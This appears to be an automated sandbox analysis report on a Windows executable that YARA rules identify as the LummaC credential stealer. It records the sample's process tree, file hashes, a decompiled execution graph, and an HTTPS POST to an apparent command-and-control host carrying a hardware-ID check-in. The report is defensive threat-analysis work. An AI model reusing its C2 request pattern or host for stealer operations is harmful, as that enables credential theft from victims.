                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TRI0avdKhOBcvsiRVoWwBfTK%2FPsXKe8QtCnUkNhNszBbFEJCe4monIeMoCqjiDmf52x%2BVB6VLc8NV1lafblqXBoVWMKKxpuA1JSYgRHCyrFpR3ON%2FRGRNAx5tIgVhxLYHOA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6fc6ab907298-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2502&min_rtt=2043&rtt_var=1094&sent=280&recv=576&lost=0&retrans=0&sent_bytes=2838&recv_bytes=554218&delivery_rate=1429270&cwnd=173&unsent_bytes=0&cid=fac32d188abfc35f&ts=7398&x=0"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.949801104.21.50.1614437460C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-18 13:18:11 UTC263OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 88
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-18 13:18:11 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 32 37 37 44 42 36 46 32 32 31 34 33 41 46 44 32 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45
                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=277DB6F22143AFD2F9F1B7136A1E0C5E
                                                                                                                2024-12-18 13:18:13 UTC1039INHTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:18:13 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=105aafnjtt635u7v7g9v9rou51; expires=Sun, 13-Apr-2025 07:04:51 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TQFYJDL1vTbMEoZgRjfMAsifwjlUlDQs85o0wkpVEQi%2B5ylivUapAx%2FAWJhAHBiaVsQmdQy%2FUmaJd1CakJM%2FGWo70iVkMjbLlEFaI3EuIzFBfsPuWw5s3h%2Fu9KAOHRqZwo8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6ffd4c950f53-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1506&rtt_var=579&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=987&delivery_rate=1864623&cwnd=193&unsent_bytes=0&cid=7f5a0a4259b3d45d&ts=1766&x=0"
                                                                                                                2024-12-18 13:18:13 UTC214INData Raw: 64 30 0d 0a 55 77 41 75 72 6c 58 53 50 33 31 63 32 2f 59 35 57 38 50 2b 74 67 31 38 55 6c 69 4f 31 53 6c 54 62 57 44 65 6a 61 53 36 67 37 49 49 65 77 7a 62 64 2b 67 64 46 53 69 76 68 67 4d 48 37 4b 4b 5a 50 45 52 6e 64 72 7a 6b 48 48 31 63 55 65 32 6a 6c 59 7a 66 6e 54 78 6d 53 50 4a 36 74 6c 6f 62 63 72 36 4f 58 48 6e 76 33 4e 42 35 58 6d 68 6f 6f 76 64 4d 63 56 64 52 6f 36 48 66 6d 50 61 51 61 53 4a 47 32 69 47 69 42 53 46 7a 68 39 6b 49 59 2f 62 51 68 44 78 4a 66 47 6d 2f 35 67 64 69 57 7a 7a 78 2f 74 44 66 34 74 38 50 4c 31 7a 50 4f 37 5a 51 45 48 4b 2b 6a 6c 78 35 37 39 7a 51 65 56 35 6f 61 4b 4c 33 54 48 46 58 55 4b 50 51 0d 0a
                                                                                                                Data Ascii: d0UwAurlXSP31c2/Y5W8P+tg18UliO1SlTbWDejaS6g7IIewzbd+gdFSivhgMH7KKZPERndrzkHH1cUe2jlYzfnTxmSPJ6tlobcr6OXHnv3NB5XmhoovdMcVdRo6HfmPaQaSJG2iGiBSFzh9kIY/bQhDxJfGm/5gdiWzzx/tDf4t8PL1zPO7ZQEHK+jlx579zQeV5oaKL3THFXUKPQ
                                                                                                                2024-12-18 13:18:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:08:17:36
                                                                                                                Start date:18/12/2024
                                                                                                                Path:C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\goldlummaa.exe"
                                                                                                                Imagebase:0xc60000
                                                                                                                File size:405'504 bytes
                                                                                                                MD5 hash:876BF2DEC67EA8626322D2C268219D76
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:08:17:36
                                                                                                                Start date:18/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:08:17:37
                                                                                                                Start date:18/12/2024
                                                                                                                Path:C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\goldlummaa.exe"
                                                                                                                Imagebase:0xc60000
                                                                                                                File size:405'504 bytes
                                                                                                                MD5 hash:876BF2DEC67EA8626322D2C268219D76
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1576307805.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1576837970.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1576336868.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:08:18:17
                                                                                                                Start date:18/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 592
                                                                                                                Imagebase:0xaf0000
                                                                                                                File size:483'680 bytes
                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:12
                                                                                                                Start time:08:18:42
                                                                                                                Start date:18/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 1616
                                                                                                                Imagebase:0xaf0000
                                                                                                                File size:483'680 bytes
                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:7.9%
                                                                                                                  Dynamic/Decrypted Code Coverage:0.6%
                                                                                                                  Signature Coverage:1.9%
                                                                                                                  Total number of Nodes:1336
                                                                                                                  Total number of Limit Nodes:11
                                                                                                                  execution_graph 8357 c64ada 8358 c64ae6 ___scrt_is_nonwritable_in_current_image 8357->8358 8383 c64d8c 8358->8383 8360 c64aed 8361 c64c46 8360->8361 8371 c64b17 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 8360->8371 8419 c65027 IsProcessorFeaturePresent 8361->8419 8363 c64c4d 8423 c669e1 8363->8423 8368 c64b36 8369 c64bb7 8394 c67558 8369->8394 8371->8368 8371->8369 8401 c66a2b 8371->8401 8373 c64bbd 8398 c61f00 8373->8398 8378 c64be2 8379 c64beb 8378->8379 8410 c66a0d 8378->8410 8413 c64dc5 8379->8413 8384 c64d95 8383->8384 8429 c65235 IsProcessorFeaturePresent 8384->8429 8388 c64da6 8393 c64daa 8388->8393 8439 c66587 8388->8439 8391 c64dc1 8391->8360 8393->8360 8395 c67561 8394->8395 8396 c67566 8394->8396 8511 c67681 8395->8511 8396->8373 9429 c61c60 8398->9429 8400 c61f16 8408 c64fd4 GetModuleHandleW 8400->8408 8402 c66a41 _unexpected 8401->8402 8403 c67eab ___scrt_is_nonwritable_in_current_image 8401->8403 8402->8369 8404 c69787 _unexpected 39 API calls 8403->8404 8405 c67ebc 8404->8405 8406 c67da6 CallUnexpected 39 API calls 8405->8406 8407 c67ee6 8406->8407 8409 c64bde 8408->8409 8409->8363 8409->8378 9820 c66b2c 8410->9820 8414 c64dd1 8413->8414 8418 c64bf4 8414->8418 9891 c66599 8414->9891 8416 c64ddf 8417 c65c28 ___scrt_uninitialize_crt 7 API calls 8416->8417 8417->8418 8418->8368 8420 c6503d std::_Xinvalid_argument CallUnexpected 8419->8420 8421 c650e8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8420->8421 8422 c6512c CallUnexpected 8421->8422 8422->8363 8424 c66b2c CallUnexpected 21 API calls 8423->8424 8425 c64c53 8424->8425 8426 c669f7 8425->8426 8427 c66b2c CallUnexpected 21 API calls 8426->8427 8428 c64c5b 8427->8428 8430 c64da1 8429->8430 8431 c65c09 8430->8431 8448 c68e16 8431->8448 8434 c65c12 8434->8388 8436 c65c1a 8437 c65c25 8436->8437 8462 c68e52 8436->8462 8437->8388 8502 c6a875 8439->8502 8442 c65c28 8443 c65c31 8442->8443 8444 c65c3b 8442->8444 8445 c67f20 ___vcrt_uninitialize_ptd 6 API calls 8443->8445 8444->8393 8446 c65c36 8445->8446 8447 c68e52 ___vcrt_uninitialize_locks DeleteCriticalSection 8446->8447 8447->8444 8449 c68e1f 8448->8449 8451 c68e48 8449->8451 8452 c65c0e 8449->8452 8466 c6d1b9 8449->8466 8453 c68e52 ___vcrt_uninitialize_locks DeleteCriticalSection 8451->8453 8452->8434 8454 c67eed 8452->8454 8453->8452 8483 c6d0ca 8454->8483 8457 c67f02 8457->8436 8460 c67f1d 8460->8436 8463 c68e7c 8462->8463 8464 c68e5d 8462->8464 8463->8434 8465 c68e67 DeleteCriticalSection 8464->8465 8465->8463 8465->8465 8471 c6d24b 8466->8471 8469 c6d1f1 InitializeCriticalSectionAndSpinCount 8470 c6d1dc 8469->8470 8470->8449 8472 c6d1d3 8471->8472 8475 c6d26c 8471->8475 8472->8469 8472->8470 8473 c6d2d4 GetProcAddress 8473->8472 8475->8472 8475->8473 8476 c6d2c5 8475->8476 8478 c6d200 LoadLibraryExW 8475->8478 8476->8473 8477 c6d2cd FreeLibrary 8476->8477 8477->8473 8479 c6d217 GetLastError 8478->8479 8480 c6d247 8478->8480 8479->8480 8481 c6d222 ___vcrt_FlsFree 8479->8481 8480->8475 8481->8480 8482 c6d238 LoadLibraryExW 8481->8482 8482->8475 8484 c6d24b ___vcrt_FlsFree 5 API calls 8483->8484 8485 c6d0e4 8484->8485 8486 c6d0fd TlsAlloc 8485->8486 8487 c67ef7 8485->8487 8487->8457 8488 c6d17b 8487->8488 8489 c6d24b ___vcrt_FlsFree 5 API calls 8488->8489 8490 c6d195 8489->8490 8491 c6d1b0 TlsSetValue 8490->8491 8492 c67f10 8490->8492 8491->8492 8492->8460 8493 c67f20 8492->8493 8494 c67f2a 8493->8494 8495 c67f30 8493->8495 8497 c6d105 8494->8497 8495->8457 8498 c6d24b ___vcrt_FlsFree 5 API calls 8497->8498 8499 c6d11f 8498->8499 8500 c6d137 TlsFree 8499->8500 8501 c6d12b 8499->8501 8500->8501 8501->8495 8503 c6a885 8502->8503 8504 c64db3 8502->8504 8503->8504 8506 c69eac 8503->8506 8504->8391 8504->8442 8507 c69eb3 8506->8507 8508 c69ef6 GetStdHandle 8507->8508 8509 c69f58 8507->8509 8510 c69f09 GetFileType 8507->8510 8508->8507 8509->8503 8510->8507 8512 c6768a 8511->8512 8513 c676a0 8511->8513 8512->8513 8517 c675c2 8512->8517 8513->8396 8515 c67697 8515->8513 8534 c6778f 8515->8534 8518 c675ce 8517->8518 8519 c675cb 8517->8519 8543 c69ff0 8518->8543 8519->8515 8524 c675df 8570 c6a83b 8524->8570 8525 c675eb 8576 c676ad 8525->8576 8530 c6a83b __freea 14 API calls 8531 c6760f 8530->8531 8532 c6a83b __freea 14 API calls 8531->8532 8533 c67615 8532->8533 8533->8515 8535 c67800 8534->8535 8541 c6779e 8534->8541 8535->8513 8536 c6af77 _unexpected 14 API calls 8536->8541 8537 c67804 8539 c6a83b __freea 14 API calls 8537->8539 8538 c6c8a1 WideCharToMultiByte ___scrt_uninitialize_crt 8538->8541 8539->8535 8541->8535 8541->8536 8541->8537 8541->8538 8542 c6a83b __freea 14 API calls 8541->8542 9148 c6ca74 8541->9148 8542->8541 8544 c675d4 8543->8544 8545 c69ff9 8543->8545 8549 c6c99d GetEnvironmentStringsW 8544->8549 8598 c69842 8545->8598 8550 c6c9b5 8549->8550 8551 c675d9 8549->8551 8552 c6c8a1 ___scrt_uninitialize_crt WideCharToMultiByte 8550->8552 8551->8524 8551->8525 8553 c6c9d2 8552->8553 8554 c6c9e7 8553->8554 8555 c6c9dc FreeEnvironmentStringsW 8553->8555 8556 c6b3b5 __strnicoll 15 API calls 8554->8556 8555->8551 8557 c6c9ee 8556->8557 8558 c6c9f6 8557->8558 8559 c6ca07 8557->8559 8561 c6a83b __freea 14 API calls 8558->8561 8560 c6c8a1 ___scrt_uninitialize_crt WideCharToMultiByte 8559->8560 8563 c6ca17 8560->8563 8562 c6c9fb FreeEnvironmentStringsW 8561->8562 8562->8551 8564 c6ca26 8563->8564 8565 c6ca1e 8563->8565 8567 c6a83b __freea 14 API calls 8564->8567 8566 c6a83b __freea 14 API calls 8565->8566 8568 c6ca24 FreeEnvironmentStringsW 8566->8568 8567->8568 8568->8551 8571 c6a846 RtlFreeHeap 8570->8571 8572 c675e5 8570->8572 8571->8572 8573 c6a85b GetLastError 8571->8573 8572->8515 8574 c6a868 __dosmaperr 8573->8574 8575 c6aec7 __strnicoll 12 API calls 8574->8575 8575->8572 8577 c676c2 8576->8577 8578 c6af77 _unexpected 14 API calls 8577->8578 8579 c676e9 8578->8579 8580 c676f1 8579->8580 8589 c676fb 8579->8589 8581 c6a83b __freea 14 API calls 8580->8581 8597 c675f2 8581->8597 8582 c67758 8583 c6a83b __freea 14 API calls 8582->8583 8583->8597 8584 c6af77 _unexpected 14 API calls 8584->8589 8585 c67767 9138 c67652 8585->9138 8589->8582 8589->8584 8589->8585 8591 c67782 8589->8591 8593 c6a83b __freea 14 API calls 8589->8593 9129 c68dbc 8589->9129 8590 c6a83b __freea 14 API calls 8592 c67774 8590->8592 9144 c67898 IsProcessorFeaturePresent 8591->9144 8595 c6a83b __freea 14 API calls 8592->8595 8593->8589 8595->8597 8596 c6778e 8597->8530 8599 c69853 8598->8599 8600 c6984d 8598->8600 8620 c69859 8599->8620 8650 c692ca 8599->8650 8645 c6928b 8600->8645 8608 c69885 8611 c692ca _unexpected 6 API calls 8608->8611 8609 c6989a 8610 c692ca _unexpected 6 API calls 8609->8610 8612 c698a6 8610->8612 8613 c69891 8611->8613 8614 c698aa 8612->8614 8615 c698b9 8612->8615 8618 c6a83b __freea 14 API calls 8613->8618 8616 c692ca _unexpected 6 API calls 8614->8616 8664 c69a98 8615->8664 8616->8613 8618->8620 8622 c6985e 8620->8622 8669 c67da6 8620->8669 8621 c6a83b __freea 14 API calls 8621->8622 8623 c6a433 8622->8623 8624 c6a45d 8623->8624 8950 c6a2bf 8624->8950 8627 c6a476 8627->8544 8630 c6a48f 8632 c6a83b __freea 14 API calls 8630->8632 8631 c6a49d 8964 c6a0ba 8631->8964 8632->8627 8635 c6a4d5 8636 c6aec7 __strnicoll 14 API calls 8635->8636 8637 c6a4da 8636->8637 8639 c6a83b __freea 14 API calls 8637->8639 8638 c6a51c 8641 c6a565 8638->8641 8975 c6a7ee 8638->8975 8639->8627 8640 c6a4f0 8640->8638 8643 c6a83b __freea 14 API calls 8640->8643 8642 c6a83b __freea 14 API calls 8641->8642 8642->8627 8643->8638 8680 c69599 8645->8680 8648 c692c2 TlsGetValue 8649 c692b0 8649->8599 8651 c69599 _unexpected 5 API calls 8650->8651 8652 c692e6 8651->8652 8653 c69304 TlsSetValue 8652->8653 8654 c692ef 8652->8654 8654->8620 8655 c6af77 8654->8655 8656 c6af84 8655->8656 8657 c6afc4 8656->8657 8658 c6afaf HeapAlloc 8656->8658 8662 c6af98 _unexpected 8656->8662 8698 c6aec7 8657->8698 8659 c6afc2 8658->8659 8658->8662 8661 c6987d 8659->8661 8661->8608 8661->8609 8662->8657 8662->8658 8695 c66d13 8662->8695 8735 c69bfe 8664->8735 8837 c6a92c 8669->8837 8672 c67db6 8674 c67dc0 IsProcessorFeaturePresent 8672->8674 8679 c67ddf 8672->8679 8675 c67dcc 8674->8675 8867 c678cc 8675->8867 8676 c669f7 CallUnexpected 21 API calls 8677 c67de9 8676->8677 8679->8676 8681 c695c9 8680->8681 8685 c692a7 8680->8685 8681->8685 8687 c694ce 8681->8687 8684 c695e3 GetProcAddress 8684->8685 8686 c695f3 _unexpected 8684->8686 8685->8648 8685->8649 8686->8685 8688 c694df ___vcrt_FlsFree 8687->8688 8689 c69575 8688->8689 8690 c694fd LoadLibraryExW 8688->8690 8694 c6954b LoadLibraryExW 8688->8694 8689->8684 8689->8685 8691 c6957c 8690->8691 8692 c69518 GetLastError 8690->8692 8691->8689 8693 c6958e FreeLibrary 8691->8693 8692->8688 8693->8689 8694->8688 8694->8691 8701 c66d4e 8695->8701 8712 c698d8 GetLastError 8698->8712 8700 c6aecc 8700->8661 8702 c66d5a ___scrt_is_nonwritable_in_current_image 8701->8702 8707 c696f8 EnterCriticalSection 8702->8707 8704 c66d65 CallUnexpected 8708 c66d9c 8704->8708 8707->8704 8711 c6970f LeaveCriticalSection 8708->8711 8710 c66d1e 8710->8662 8711->8710 8713 c698ee 8712->8713 8714 c698f4 8712->8714 8716 c6928b _unexpected 6 API calls 8713->8716 8715 c692ca _unexpected 6 API calls 8714->8715 8718 c698f8 SetLastError 8714->8718 8717 c69910 8715->8717 8716->8714 8717->8718 8720 c6af77 _unexpected 12 API calls 8717->8720 8718->8700 8721 c69925 8720->8721 8722 c6993e 8721->8722 8723 c6992d 8721->8723 8725 c692ca _unexpected 6 API calls 8722->8725 8724 c692ca _unexpected 6 API calls 8723->8724 8732 c6993b 8724->8732 8726 c6994a 8725->8726 8727 c69965 8726->8727 8728 c6994e 8726->8728 8731 c69a98 _unexpected 12 API calls 8727->8731 8729 c692ca _unexpected 6 API calls 8728->8729 8729->8732 8730 c6a83b __freea 12 API calls 8730->8718 8733 c69970 8731->8733 8732->8730 8734 c6a83b __freea 12 API calls 8733->8734 8734->8718 8736 c69c0a ___scrt_is_nonwritable_in_current_image 8735->8736 8749 c696f8 EnterCriticalSection 8736->8749 8738 c69c14 8750 c69c44 8738->8750 8741 c69c50 8742 c69c5c ___scrt_is_nonwritable_in_current_image 8741->8742 8754 c696f8 EnterCriticalSection 8742->8754 8744 c69c66 8755 c69a4d 8744->8755 8746 c69c7e 8759 c69c9e 8746->8759 8749->8738 8753 c6970f LeaveCriticalSection 8750->8753 8752 c69b06 8752->8741 8753->8752 8754->8744 8756 c69a83 __strnicoll 8755->8756 8757 c69a5c __strnicoll 8755->8757 8756->8746 8757->8756 8762 c6b71e 8757->8762 8836 c6970f LeaveCriticalSection 8759->8836 8761 c698c4 8761->8621 8764 c6b79e 8762->8764 8765 c6b734 8762->8765 8766 c6a83b __freea 14 API calls 8764->8766 8788 c6b7ec 8764->8788 8765->8764 8771 c6a83b __freea 14 API calls 8765->8771 8785 c6b767 8765->8785 8767 c6b7c0 8766->8767 8768 c6a83b __freea 14 API calls 8767->8768 8769 c6b7d3 8768->8769 8773 c6a83b __freea 14 API calls 8769->8773 8770 c6a83b __freea 14 API calls 8774 c6b793 8770->8774 8776 c6b75c 8771->8776 8772 c6a83b __freea 14 API calls 8777 c6b77e 8772->8777 8778 c6b7e1 8773->8778 8779 c6a83b __freea 14 API calls 8774->8779 8775 c6b85a 8780 c6a83b __freea 14 API calls 8775->8780 8790 c6b145 8776->8790 8818 c6b243 8777->8818 8783 c6a83b __freea 14 API calls 8778->8783 8779->8764 8784 c6b860 8780->8784 8783->8788 8784->8756 8785->8772 8787 c6b789 8785->8787 8786 c6b7fa 8786->8775 8789 c6a83b 14 API calls __freea 8786->8789 8787->8770 8830 c6b8b8 8788->8830 8789->8786 8791 c6b156 8790->8791 8817 c6b23f 8790->8817 8792 c6b167 8791->8792 8793 c6a83b __freea 14 API calls 8791->8793 8794 c6b179 8792->8794 8796 c6a83b __freea 14 API calls 8792->8796 8793->8792 8795 c6b18b 8794->8795 8797 c6a83b __freea 14 API calls 8794->8797 8798 c6b19d 8795->8798 8799 c6a83b __freea 14 API calls 8795->8799 8796->8794 8797->8795 8800 c6b1af 8798->8800 8801 c6a83b __freea 14 API calls 8798->8801 8799->8798 8802 c6b1c1 8800->8802 8804 c6a83b __freea 14 API calls 8800->8804 8801->8800 8803 c6b1d3 8802->8803 8805 c6a83b __freea 14 API calls 8802->8805 8806 c6b1e5 8803->8806 8807 c6a83b __freea 14 API calls 8803->8807 8804->8802 8805->8803 8808 c6b1f7 8806->8808 8809 c6a83b __freea 14 API calls 8806->8809 8807->8806 8810 c6b209 8808->8810 8812 c6a83b __freea 14 API calls 8808->8812 8809->8808 8811 c6b21b 8810->8811 8813 c6a83b __freea 14 API calls 8810->8813 8814 c6b22d 8811->8814 8815 c6a83b __freea 14 API calls 8811->8815 8812->8810 8813->8811 8816 c6a83b __freea 14 API calls 8814->8816 8814->8817 8815->8814 8816->8817 8817->8785 8819 c6b250 8818->8819 8820 c6b2a8 8818->8820 8821 c6b260 8819->8821 8822 c6a83b __freea 14 API calls 8819->8822 8820->8787 8823 c6b272 8821->8823 8825 c6a83b __freea 14 API calls 8821->8825 8822->8821 8824 c6b284 8823->8824 8826 c6a83b __freea 14 API calls 8823->8826 8827 c6b296 8824->8827 8828 c6a83b __freea 14 API calls 8824->8828 8825->8823 8826->8824 8827->8820 8829 c6a83b __freea 14 API calls 8827->8829 8828->8827 8829->8820 8831 c6b8e4 8830->8831 8832 c6b8c5 8830->8832 8831->8786 8832->8831 8833 c6b2ac __strnicoll 14 API calls 8832->8833 8834 c6b8de 8833->8834 8835 c6a83b __freea 14 API calls 8834->8835 8835->8831 8836->8761 8873 c6abaf 8837->8873 8840 c6a953 8845 c6a95f ___scrt_is_nonwritable_in_current_image 8840->8845 8841 c698d8 __dosmaperr 14 API calls 8849 c6a990 CallUnexpected 8841->8849 8842 c6a9af 8844 c6aec7 __strnicoll 14 API calls 8842->8844 8843 c6a9c1 CallUnexpected 8846 c6a9f7 CallUnexpected 8843->8846 8887 c696f8 EnterCriticalSection 8843->8887 8847 c6a9b4 8844->8847 8845->8841 8845->8842 8845->8843 8845->8849 8852 c6aa34 8846->8852 8853 c6ab31 8846->8853 8863 c6aa62 8846->8863 8884 c6786b 8847->8884 8849->8842 8849->8843 8866 c6a999 8849->8866 8852->8863 8888 c69787 GetLastError 8852->8888 8854 c6ab3c 8853->8854 8919 c6970f LeaveCriticalSection 8853->8919 8857 c669f7 CallUnexpected 21 API calls 8854->8857 8859 c6ab44 8857->8859 8861 c69787 _unexpected 39 API calls 8864 c6aab7 8861->8864 8862 c69787 _unexpected 39 API calls 8862->8863 8915 c6aadd 8863->8915 8865 c69787 _unexpected 39 API calls 8864->8865 8864->8866 8865->8866 8866->8672 8868 c678e8 std::_Xinvalid_argument CallUnexpected 8867->8868 8869 c67914 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8868->8869 8872 c679e5 CallUnexpected 8869->8872 8871 c67a03 8871->8679 8942 c63c8e 8872->8942 8874 c6abbb ___scrt_is_nonwritable_in_current_image 8873->8874 8879 c696f8 EnterCriticalSection 8874->8879 8876 c6abc9 8880 c6ac0b 8876->8880 8879->8876 8883 c6970f LeaveCriticalSection 8880->8883 8882 c67dab 8882->8672 8882->8840 8883->8882 8920 c67ba1 8884->8920 8887->8846 8889 c697a3 8888->8889 8890 c6979d 8888->8890 8892 c692ca _unexpected 6 API calls 8889->8892 8914 c697a7 SetLastError 8889->8914 8891 c6928b _unexpected 6 API calls 8890->8891 8891->8889 8893 c697bf 8892->8893 8894 c6af77 _unexpected 14 API calls 8893->8894 8893->8914 8896 c697d4 8894->8896 8899 c697dc 8896->8899 8900 c697ed 8896->8900 8897 c69837 8897->8862 8898 c6983c 8901 c67da6 CallUnexpected 37 API calls 8898->8901 8902 c692ca _unexpected 6 API calls 8899->8902 8903 c692ca _unexpected 6 API calls 8900->8903 8904 c69841 8901->8904 8905 c697ea 8902->8905 8906 c697f9 8903->8906 8910 c6a83b __freea 14 API calls 8905->8910 8907 c69814 8906->8907 8908 c697fd 8906->8908 8911 c69a98 _unexpected 14 API calls 8907->8911 8909 c692ca _unexpected 6 API calls 8908->8909 8909->8905 8910->8914 8912 c6981f 8911->8912 8913 c6a83b __freea 14 API calls 8912->8913 8913->8914 8914->8897 8914->8898 8916 c6aae1 8915->8916 8917 c6aaa9 8915->8917 8941 c6970f LeaveCriticalSection 8916->8941 8917->8861 8917->8864 8917->8866 8919->8854 8921 c67bb3 __strnicoll 8920->8921 8926 c67a14 8921->8926 8927 c67a24 8926->8927 8928 c67a2b 8926->8928 8929 c67b32 __strnicoll 16 API calls 8927->8929 8930 c67b78 __strnicoll GetLastError SetLastError 8928->8930 8932 c67a39 8928->8932 8929->8928 8931 c67a60 8930->8931 8931->8932 8933 c67898 __strnicoll 11 API calls 8931->8933 8935 c67ad9 8932->8935 8934 c67a90 8933->8934 8936 c67ae5 8935->8936 8937 c67afc 8936->8937 8938 c67b15 __strnicoll 39 API calls 8936->8938 8939 c67877 8937->8939 8940 c67b15 __strnicoll 39 API calls 8937->8940 8938->8937 8939->8866 8940->8939 8941->8917 8943 c63c96 8942->8943 8944 c63c97 IsProcessorFeaturePresent 8942->8944 8943->8871 8946 c644d1 8944->8946 8949 c645b7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8946->8949 8948 c645b4 8948->8871 8949->8948 8983 c6a038 8950->8983 8953 c6a2f2 8955 c6a309 8953->8955 8956 c6a2f7 GetACP 8953->8956 8954 c6a2e0 GetOEMCP 8954->8955 8955->8627 8957 c6b3b5 8955->8957 8956->8955 8958 c6b3f3 8957->8958 8962 c6b3c3 _unexpected 8957->8962 8959 c6aec7 __strnicoll 14 API calls 8958->8959 8961 c6a487 8959->8961 8960 c6b3de RtlAllocateHeap 8960->8961 8960->8962 8961->8630 8961->8631 8962->8958 8962->8960 